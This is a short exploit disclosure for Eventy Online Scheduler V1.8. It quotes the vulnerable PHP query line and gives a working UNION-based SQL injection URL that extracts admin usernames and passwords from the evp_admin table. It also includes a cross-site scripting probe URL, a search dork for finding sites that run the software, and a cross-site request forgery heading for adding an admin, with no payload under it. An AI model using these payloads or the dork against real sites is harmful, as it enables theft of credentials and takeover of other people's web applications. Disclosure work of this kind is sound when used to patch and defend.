Eventy Online Scheduler V1.8 - Multiple Vulnerabilties =================================================================== #################################################################### .:. Author : AtT4CKxT3rR0r1ST .:. Contact : [F.Hack@w.cn] , [AtT4CKxT3rR0r1ST@gmail.com] .:. Home : http://www.iphobos.com/blog/ .:. Script : http://calendarscripts.info/event-calendar-software.html .:. Dork : "Powered by CalendarScripts.info" #################################################################### [1] Sql Injection ================== VULNERABILITY ############## /eve_event.php (line 15-16) $query="SELECT * FROM $T_EVENTS WHERE id=".$_GET['id']; $event=$DB->sq($query); ######### EXPLOIT ######### http://site/eve_event.php?id=null+and+1=2+union+select+1,group_concat(id,0x3a,username,0x3a,pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+evp_admin [2] Cross Site Scripting ========================= http://site/eventy.php?next=1&selmonth=January&selyear=2014'"()%26%25 [3] Cross Site Request Forgery ============================== [Add Admin]
####################################################################